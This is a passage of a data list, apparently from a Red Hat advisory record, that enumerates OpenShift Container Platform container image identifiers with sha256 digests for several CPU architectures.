"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:4b6872dc40d53d4657492e3e25592e98f7300cc543dc16a6d58ae78b74781416_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e162628148310e6bf86cdafe3d0d0ce36c7842a9a6567381b9d90acde4ae0544_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:843593a17636af6b6dae5f0e172ee2590414d093b3c53a5e8ef65de050890424_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:bdfe3cf241ac03b5c4003a9f9ee3e6369e4ecc298b9c6c9a7c24c9d938b06b1f_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:f1daae683b8df5ea0e559e3acfdd53491bcf4fd589a129c70b77e6621480003e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:f39bd18cd41526b1a7c11316b587246675331c87aae0307e43b6eb87a6674bb2_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:1e6aa292e001c7241399cbf5ca290e8fd58be92f58b0f5d194ea4d5fd38db82c_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:29191caf2f01529eaac34d2f958b07c3998549def5918a38b5a4622c006e8fb4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:43bfff1dba401620d69e3e8c2ebbd661ccaef081b01a440d820027560d1ab148_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a7cb08bfe6a43532c63adc5814799d5f05d9c70459522da53b86c625120ba27b_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:69b04e6d42b12ede1cdfdeebef7d8a76fe5eda20f29c5e99f26cb1e0bc98cf8e_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:6cd0a2b56a3dcb79dc0e77d21460e502080936cd9bb72ffc0b9217834b2f2508_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ada91f9ca5511960bf9186bbdf489e8702f5cd6b8dd3de904e99e4cd0cd27d02_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:f3348d2d5a03fcea547d437cdee0a412ae05e92d91c73fd864f06df6d0cf6e7c_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:4af787e869ad4a769be66c220cfd4fe65da3addeec80a827c0fc3530465dec2e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:7ee4146f484104010f00c32163b617db387b277ce9f38ab0e1e474cbbb310638_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:358352e377bb3428a676e37d75c8194c5b321f871cb60612208baf074d5dd660_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:534b97046a6f7b420a88295ce95651c3dbdf6024ef13c6941ffc83f4880ae5f1_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6e31b25a4ecbbf3b675741fab14b822a864fd52b95b889c3ce7f8fdfae57121c_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:bb8837b1089c78b2e0be230a4cfeebebcc32389f29dd1fbe658eb4ed79dbe328_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:337f01cb3cd356b2f89a0bb2b22b046ba8fb471f360eced07e5354c77cd5daff_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6722e6c8692d3258b5bd1b9b1efb8e02928125d18d73d11259ee8f7f4f6f164f_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:8b78938f11f25edec777f3f26c6aea87503df3bc0de9d55860d7b854a0b4be9e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:b42a26554907833993dd5c132f0eaf9577c9a022b7648d30ac67ae29b2eabc7b_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:5e98690d966f8b1870a076932f0abda2b19eb48a872f73d8ec53b07c8718f5c2_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:697d6e677df07abbf0abbe196bb3658128893fc4a1a59e375ba3f204b2532591_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:6d5eb52cc650f72ccea8a587d7c53766fcc82d17b3c1f6c4aff8a29c91071582_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:e301810ba7726631695c694571f4591744c4049d0fcf08fb7f65687385a5b77e_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3c8d94356ae95f6f20cdd4ff993855d3522e3dc7f6eb8212eaa45a3ca360ae92_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3ed369f130a563c4e8e17d7d1f85974228b83a04650443eb7139eff04f487a82_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:830c1cd0eabd63ccf8720de080e5afd1d4612df9953e7f15548c6939a5f0601f_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:a6b47f4a8b72a692def0cec90bfaf2fb9185554cd26697ba62a16f88dd4fca6c_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:117f14d49f5795a607426d9dbb72410839476f8f05fa49a84b127d58335db632_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:32488f18b64730ec0984572eefce302c966c451d60876c3550583d388e367fbb_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e9dd24555cc2b1e4b0d71a564ba0b1d6f6458ac4ae1ce1de599bb80732b5629f_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f2aa35a07325a3bc77b1ef19a64142df335fec60495945bd414396afe08af723_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:44d6bbb8472af382cbe22f01e99e242e5ca17b87bd8b559fc0acfd52ed22026d_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:741a9140d522d685da85e744f088722106e5e6ef5130bb58616a5ceafb7aa46e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:9d2512cf69eb26236309098cccc8a79f6ddde8948975658423746a5c87d9b13b_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c4a4f87455a06632dfb8015913b859accde36aa9cc51ab6c9b28c71d209ecc1f_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:52ea8e976c4493d18356056e776b27d0100b9ff1d13a7c1843b8bf1bb29af9fb_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:acdd8863b390027824810aa2d1267728539dc1f8f89f8c4922d0af9e54c4cf8e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:ad39a63a12fe1ed56751d25beeea1bce55f09fdb2a4435c3cab92518e6225c93_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:f6d1fe0fbb9865bab0af088baa9e941266d38697906ac041ec202a870a537810_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:01c38bdc45e61c8aae912c2811c052b3ae1ffd383265976b53e73405c5f6d14c_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:79c9e0cd616983cf38b32c1606d9636f539975aa79b413ac9f06e0b336bd3d94_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:7dc3b09e9ef10304566de13cf3bee114d0671ea8306c42b94a9fa2ae45e00155_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:c9950a5f092d1bf0f9bd281e2cd161b4c53a8b9a8335911df110012b9a19ac4c_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:29a4d464b56fe5225919de5034798b970708e128b55e1ca7ddba53344e79778c_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:4ed8ca355b2fa3e7f304a22aa347e1611bafc45ec3666a2f26693f093ccaad11_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:af3cd518399c69bb2dfeee63db16ece4221f86bb5fd4367e6fc4855e7c094e0e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:bd4827507f60faea220fc23b0c5e96852d6a0f264b1ab4244b0f3a6733aed226_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:0556a83b37f75836a6269c901f4fe9898dded7f04e8d4096d0b4ad09d53dfe90_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:b7b0327a11ee514d86c11faba549e614b7bc32f4998365d3372b23fbdce92f45_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c0001b283485a536f3bc95ad9095564ca637bcfea44ce1139b285339586f1165_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:d24318c9fc02f5d9d2e6bab9ba9d9450b44cd40962349f555f3090ac519b9c15_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:484dd2472b2c56bbcf927cf1665a785d07057b40f2219f3d4c26a6febb9b6efe_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:6ec6749f659c131148713fa74ca30e17622814fab8f891a7cd823d65c6a9d93b_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:934e5f00851d37ed1d324f0aca7fb32c584db8352c5a79b06ba0412469add29b_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:ad4e1756a4e4703806818721c390347d06632762eb0613e34fdd9dff25122d93_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:7e573786dc8a3102297cdeb8e8df2d3baf09f84e90d23d3df307d119b8c50f1a_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fd5caff02b551caf0a6246b803591de5b01a5ee5e4caf98f0bbc42003bb0ffbe_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:47fcac8f8d0002e0f7d66cc90f9f2768b9c9e713089ce281bc4c39532f9d8290_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:579ec95bfbafe095682fcd83739112440e59a65ca8aa09a0362e1c7ae13fa55e_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5d044d51008f938694e3ff32b0190bef0cfd717dc6373a988fc4b89522869736_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f4c29b8743f133e7480aebbc25971f9357badd3befa9f9487503c39a4bf55f66_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:5e53f158e380070656ae5fa0be5aab36f74188ca981aa6c523aead1d926bcfe8_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:9215463c548662202ddd125670b45d64f847595ffa540d6fe9cbb3482c5eabe0_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:997da5aecef571f4733b9de7a23882decc79f3b1e121f9524cb58d5f0343a8b2_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:0796012228b715b8d0b1f7f8a8716e5fcb8e1eef5b4c91c1b9aeb586764165a1_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:822b61d5af679d4040c7ae01495dd7f0ebc187a7c3aced2d7c70ed39d09f792d_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:a66aa215d0b85dfb8f0809c7920a0616c0f9422c8101336311a0372e1599fac5_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b51b955ab667088df969d867c5c78afa6c0e91799a77947c71f74fe5121e4b82_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3f75242f1c9a7f21c44291c7920f9de873e3f888c0848ceb868c93fc52cadf59_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:c691d971d54dfac8a3d2b4560df928887c0c42726ea53276acc6fd82796fe013_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:ce0cc9b08b407cc5c7e2fb4b8b8046aa8d6602ff4f0f1446705ba41ebc343113_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e9c032f902b75cfdbcace74992f172093a13adf9a3e56fa863916acceb687f69_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:a00a2c837b45a833c9480610052c2758a89ca13bddea7205fa864cf669b9a537_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ed059e0a5fc89373a42df693cce41426035f587aa81cf2ac7986d3c3a74bc252_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:0c07c89d2e6ed9ee9f484ab11623fb55f6d9d6328bb59ac475b6b26e354f2fa4_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:b8ab622ccda9a36914c49e39c68bfb6bdb9a268e4564e40cc049f78b6995a40f_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:ce1eb507f327c654614af04bf3cdfc16b958e4826f5aabc3c2d9ba94f4f2e55c_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:d4a2a09d63248f7f338ebadbdb03b48299d3c9284cb71ba81c3a6dc58534703c_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:8af34f7f4fb73551a98d986d0bb1e59beb3ff58fed5c0abcdf7fa4ff40697926_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:bdbd1f9f158d0a48d2cad324c3956c74d1820ae81f5db242a2b8573c271f0f0a_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f532fe57b2214b4cd215af2d9d34bb77d46eca74ae6dc96e6b6ce3df16f19ed0_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f8de6e3bc707d84b0e44610c14a2cf7811175f49616678f24930e80861eb747d_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:691b019fb05a753e814a5aba61569635318334e29f4a8bfee0ff0c0c33028978_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:8f1848090e84bf6b19b86185443f820c6f935582cdfadea3e197a6be044c51bc_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:3ee1daa00cc3c529cd0c1f6116694e2792f9384633084d0e2ec4d85fac6394f3_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:7679a49d3de0c40c142457d4d5ff66e22d5dffaa563fd58227d92f7483239779_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:2818f7d8c47b51a811ff46e8d83146b50bdbe7657f89a11a19a3a9e262c40eb4_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f3906dd6b9a9de755e0f94b1cf9f38855ebc93b8d3bcb66330e86553b9a0a8c2_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:570296451ca687e24780c6e744043252477d343f01abbf293369d83f15abd62e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:66bf4a0ba4cbc5c74d13c83255452e5738e34fa7ef1b5966706c5f41d58d161e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:878321fdebbc4e97d882cf7b686243d5d3ac7ed26455a476213d489dafa44067_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:b7cbd857137605b98d4af1b4b34685efacf3eef3f7e6c9f60ef8266ae29656b4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:100687023e0bdfbf08cbce13b19dabdcb8c2b23db3d8c103b72091c76f95029f_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:1ce64cfcf954f04197e06b6b02be1193898157c629cc3c28592c768c3729d0db_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:6d3d645e051fcd005a3a0a07585ed9889ecdb8fef6eb655223eabf200f084030_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:8d95ee03d7ae5eed6b0f051341812973b5a9a5af0ebb78e290db44aa9fd63aea_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:49d30e3ca8d16ae71846bf12e11e2587df29d5c336b1c35cc4a30a80d655cf6e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:84aeed4f507496f3e720a6d7f29b275bbb5927a6497d2fab4297c280f363f59c_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:9038aed4ef231563705daaa5a16ff519038611c6a5e19b81ad5b400288dd5fb4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:d0f27efa05b636e158d326467493b4bbc37a33b9e9965f54d650544d63e3ef01_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:40b444fee41057654328f8d759492125f8ab93f80d937b00bd14f4f1c8426709_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:9d17eb13f9c4440fd39d57fff9e6dfd0c501a588d51ee4083f42afaf96118a8c_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:da70d7892969c1a5664afff73ed9c1e633b7db1c2d10c0fe2019fcbbbfae6b14_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:fa0b10e03c4eb82878aae6d798285a61db57b5cbf067f6e8b2787ef02508fa57_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:58f80f5145dc8e26cad376643dc01b4906f554c692cb6549ff75ac6d6651c4d5_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:5d5f2e96e9216c9858a00c3f5e6da0441b8431e1916cb2bf15f30106454283d0_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:776a77a7e19347c98d94ca93e932b5724a50bb3f742e480e7c280d26afb495a5_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c23d9b764dd40921bf9b06cfcddeb0aeb69debee263fd8220ad94931a9d074c0_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3ae7b9aeee5cfbc483740ab12ccfea870058aec11062863bb390798ff3512715_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:450ebeed9ae176a811c7be57d28cb1c257fb4a6ebdb1f74d2725ceb2d2584c21_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:4f54aacc484e51eebd471b1fe856929613e08e43c9eff0af3712e1f8f2a2d1f8_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:6876729ee9b06ce876c1a9b210d1ae1751bb965ddd69758f93de0a8e58043b98_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:265c50f7fa75113825c43dc6b49f60a6811cbf519d41d967970b1febf3b899a3_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8493400910b85f1fa3fa320934ec2ba460410a5fa1e7271b749b833d3f246d4a_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:a3dd55efb46f98a95d7161c464253cbf2e7157446935df921e08c5037aaa3c6d_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e880c7fb37086ce67796656384dd6ec09dcbdd3e78cc379fb237931364702391_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:45153e4c66f37343ea27bab6df05b9c45a9b75d346678c574a2645ac26a6af3e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:4d3cc1ecd034ffd24fa3d7271ac10378fa01221ad6c53403ec19c1c681cdd141_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:60f6eb74dc8622db479b1939b65ea403464560fc4020a9b359164c3245b5e345_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:d73fb109074fa5b6b424e006a9e2c2fd7fb18417e3595beed0c4ecb40eeb5a74_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2f7019f05cffad43ab49fccc06fd23c04e9528c0a8ff5f0e59a9e3ea9297eed3_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:59a7b828aa62ba7b4ae0220b1a473f760aed0a45a52783068dac21879d6e0f6b_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6cafee543c79ead47ce0f20f21a27e5cf086d83efe1729f749feab1c17a993c4_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:8b96fa4e6e53068f8c68326e469376249306b89baeadb9c40f47d33c66552b55_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:30c8b7393e61e2a297a042a9471640788eed9bc54d12ab2c30a669b2bc424136_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5a8eedf55bdce3483fbad37f69a026a3d18b8f34ce9bf7bf7075ae28a385244d_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:706f1b7b8e8ddccd2fd47292295e781954c5ca601f359d8b38c8ae2403ea00ca_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:f721e2d6e9e1b0b40a61de3f8ad74ea17e4b786dd462e8cfb5745cf0e8a591c3_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:20d3df0bfd6732f7839f5b16ea87c7ae5b8d038134917c7655d9dde4aa839fb2_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:21a09683622f27d380a8b962b345f5b162dbbc3c602eedb823a3cfe533449db0_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:622b16ed0cfdff14a82cc30ff4405866b97f14fb72a0e2392a3400e36292fc55_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:b0af447305b8eea12ac4d18ae8685137f199e2df1867c9fe02d14e22e2ef9b03_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:3b5e83c1adca7d30285766393e2a20b7da8ad7a66f0e0f65121758bde6bab001_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:492636bcc242efbed9b25e2892c750643b74786a86c6702f425d78cf81624371_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:79dda8b8e9ee2839a8d915103d762f75b8adcbddd0752c5feb576ce49ea7c012_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e88ee9434d0200e50d907c3ce501e346278973dfd4cb937ed4cb07e82451068a_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0c43c58afb2f86cd157abb2399616592e4f264352257bd8b8cec738b5f2a247a_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:ca3319b72e74c7d6a773ad551c6cda70c06448dc07afd4bda20c698e4438f253_arm64",
